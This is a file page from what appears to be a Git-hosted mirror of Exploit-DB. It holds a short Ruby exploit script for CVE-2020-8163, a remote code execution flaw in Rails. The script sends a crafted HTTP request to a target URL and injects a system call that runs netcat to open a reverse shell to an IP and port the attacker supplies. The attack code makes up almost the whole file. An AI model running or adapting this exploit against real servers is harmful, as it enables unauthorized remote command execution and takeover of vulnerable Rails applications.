bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/ruby/webapps/48716.rb
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

32 lines
No EOL
799 B
Ruby
Executable file
Raw Blame History

# Exploit Title: Rails 5.0.1 - Remote Code Execution
# Date: 2020-07-19
# Exploit Author: Lucas Amorim
# Vendor Homepage: www.rubyonrails.org
# Software Link: www.rubyonrails.org
# Version: Rails < 5.0.1
# Tested on: Linux/OSx
# CVE : CVE-2020-8163
# More information: https://github.com/sh286/CVE-2020-8163
#!/usr/bin/ruby
require 'net/http'
def header
puts "[*] - CVE-2020-8163 - Remote code execution of user-provided local names in Rails < 5.0.1\n"
puts "[*] - Author: Lucas Amorim lucas@lucasamorim.ca"
puts "[*] - Usage: \n"
puts "ruby exploit.rb <url> <ip> <port>"
end
if ARGV.length < 3
header
exit(-1)
end
url = ARGV[0]
ip = ARGV[1]
port = ARGV[2]
puts "[*] Sending payload to #{url}"
uri = URI(url+"?system(%27nc+-e+/bin/sh+#{ip}+#{port}%27)%3ba%23")
Net::HTTP.get(uri)
Reference in a new issue View git blame Copy permalink